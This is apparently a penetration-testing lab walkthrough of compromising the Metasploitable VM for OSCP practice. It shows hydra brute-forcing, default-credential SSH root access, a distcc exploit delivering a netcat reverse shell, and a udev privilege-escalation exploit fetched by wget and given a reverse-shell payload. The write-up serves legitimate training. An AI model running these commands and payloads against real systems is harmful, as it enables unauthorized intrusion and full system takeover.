Hey people!
During my learning process I experimented a lot with this VM. In my opinion the vulnerabilities on this VM are pretty simple and you can optimize and improve your methodology on it.
On this walkthrough I will show you how I’ll go through without using MSF, Nessus, OpenVAS, etc.
For this I will using the basic setup of Kali.
Methodology:
- Detect Living Host(s)
- Open TCP Ports
- Open UDP Ports
- Service Detection
- Service Enumeration
- User Enumeration from Services
- Password Profiling
- Brute Forcing
- Detect Running OS
- Simple Vulnerabilities Detection
- Manual Vulnerabilities Detection
- Exploit Research
- Exploit Fix
- Exploitation
- Post-Enumeration
- Privilege Escalation
- Proofs
Notice thats my methodology which I developed for the OSCP and are not the steps I’ll going through. So I will possibly jump or skip over the topics.
1. Detect Living Host
So at first I want to detect the IP of the metasploitable VM.
I’ll use nmap for it.
nmap -sn -n 10.11.1.0/24 | grep for | cut -d" " -f5
2. Open TCP ports
Now, after I detected the IP of the target (10.11.1.10) I will run a light TCP scan and try to detect open ports and the services running on it.
nmap -n -Pn -sS 10.11.1.10 --open --reason -sV --top-ports 200
Sweet. Thats a lot of open ports. 
So lets run a full and aggressive TCP scan in the background and at the same time I’ll manually scan Samba & SMTP services which will hopefully receive some users for this machine.
# nmap -n -Pn -sS 10.11.1.10 --open --reason -A -p- > metasploitable &
Because I found a lot of open ports I’ll jump to the User Enumeration topic.
6. User Enumeration from Services
The heavy scan is running in the background so we can proceed and try to enumerate from the Samba service some users using enum4linux:
# enum4linux -U 10.11.1.10
Here is the output:
Now I will create a userlist of the Samba service that I will use later.
# !! | grep 'user:' | cut -d'[' -f2 | cut -d']' -f1 > userlist
Lets check if I can find some users using smtp-user-enum.py with the VRFY command:
# smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.10 > smtp_users
Now I will generate an userlist of all the users I found.
# cat smtp_users | grep exists | cut -d" " -f2 >> users
Nice!
If you noticed from above the heavy TCP scan has been finished too.
Lets see which new ports has been found.
7. Password Profiling
For the first step of password profiling I’ll use the list of the usernames we previously enumerated as the first stage of my passwordlist.
I will return to this point later when we take a look over other services.
8. Brute Forcing
Now the heavy scan shows me two new ports (3632 & 8180). Next I will use hydra to bruteforce the FTP, SSH, Telnet, NetBIOS, MySQL and PostgreSQL service and try to login. As credentials I will use enumerated usernames as passwords.
### FTP ###
hydra -L users_metasploitable -e nsr ftp://10.11.1.10 -q -o ftp_login
### SSH ###
hydra -L users_metasploitable -e nsr ssh://10.11.1.10 -q -o ssh_login
### Telnet ###
hydra -L users_metasploitable -e nsr telnet://10.11.1.10 -q -o telnet_login
### NetBIOS ###
hydra -L users_metasploitable -e nsr smb://10.11.1.10 -q -o smb_login
### MySQL ###
hydra -L users_metasploitable -e nsr mysql://10.11.1.10 -q -o mysql_login
### PostgreSQL ###
hydra -L users_metasploitable -e nsr postgres://10.11.1.10 -q -o postgres_login
Very nice!
There are a lot of accounts we can use to login on the machine.
But first let me compare the results to one single list.
cat ftp_login mysql_login postgres_login smb_login ssh_login telnet_login | grep host | column -t > metasploitable_accounts
As you can see, it was a quick task and we have some accounts we can use to login but the user msfadmin looks like it could be in the sudoers group. So I will start with this user.
9. OS Detection
To identify the exact OS informations I’ll start just now to enumerate the exact OS, because the banners of the results from nmap can be false positive or just not exactly enough. So I have to identify the exact OS version manually using ssh.
So let me login using the SSH service:
# ssh [email protected]
.. (yes/no)? yes
... password: msfadmin
$ uname -a
Now lets take a look if we have access to run a shell with root privileges.
$ sudo -i
password: msfadmin
One of a lot ways are done!
Now I have access to a full privileged account and I’m controlling the system. There exist more other ways to pwn this machine. I showed you the first way I tried out.
Let’s see if I can break into using another way.
10. Simple Vulnerability Detection
What I will do is a simple vulnerability scan with nmap.
# nmap --script vuln 10.11.1.10 -p- --open
This scan shows me a lot of vulnerable stuff but the most of them are SSL or DOS vulnerabilities. I picked up the distcc daemon because the vulnerability seems to be exploitable.
12. Exploit Research
I found an exploit by using searchsploit pretty fast. There is just one result.
# searchsploit distcc
Mh. The exploit is handled by MSF and I don’t want to use it.
So let me think a little bit. Did I missed something?
How did I found this vulnerability? -> Using Nmap.
Ok. I used a script for that.
So let me take a look one more time at the results.
Oh… I overlooked that the script (distcc-cve2004-2687.nse) used the id command for the “Extra Information” which shows me the uid of the current user. 
* shame *
So it looks like the Nmap sent this command to this service. Let me take a look over the documentation of this script from the homepage.
NSE-doc: distcc-cve2004-2687.nse
14. Exploitation
Let me change it to possibly get a bind shell using netcat at first and then try to connect to it.
Nice! Bind shell works and additional I found out the machine has netcat installed. Let me see if a reverse shell works too.
So I setup a listener on port 6666 and then run the nmap-script with the cmd for a reverse shell.
# nmap 10.11.1.10 -p 3632 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -nv 10.11.1.11 6666 -e /bin/sh'"
Very nice! Now I have a reverse shell.
Now I want to spawn a TTY using python.
python -c 'import pty; pty.spawn("/bin/sh")'
15. Post-Enumeration
Now I want to get root without interactive mode for sudo. So I have to enumerate some stuff.
$ uname -a
$ cat /proc/version
The kernel & OS version seems to be outdated. * … You don’t say… *
I take a quick search on google to find an privilege escalation exploit especially for this version.
So I search for Ubuntu 4.2.3-2ubuntu7. Google shows me the name of this version called Hardy.
My next step is to google for this version name. And you can see a few interesting results.
I searched a little bit about every exploit and found the CVE-2009-1185 very pretty. I will try it out. In the results before I found it on the exploit-db. So maybe I have it locally already.
searchsploit 8572 linux
Nice!
16. Privilege Escalation
Let’s copy the exploit to my directory.
# locate 8572.c
# cp /usr/share/exploitdb/platforms/lin_x86-64/local/8572.c privescal.c
I want to take a look inside the code to see if I have to take note for some configurations or usage.
So I have to pay attention to
- right PID of udevd (PID - 1 as argv[1]),
- /tmp/run and
- the payload inside it.
Simple usage.
But before I can transfer this exploit I have to setup a basic Python Webserver on port 8080.
# python -m SimpleHTTPServer 8080
After that I use the reverse shell to get the file with wget from my machine, compile the code, add my payload to /tmp/run and look for the PID.
$ wget http://10.11.1.11:8080/privescal.c
$ gcc privescal.c -o privs
$ echo '#!/bin/sh\n/bin/netcat 10.11.1.11 5555 -e /bin/sh' > /tmp/run
$ ps aux | grep udev
Now I will use the founded PID - 1 (2575) for this exploit.
After starting my listener I’m ready to catch the shell…
# nc -nlvp 5555
$ ./privs 2575
Done!
If you have some advice or recommendation to improve my methodology, or want me to add more ways to it so feel free and just tell me that.
Thx and have a nice day!
Cry0l1t3
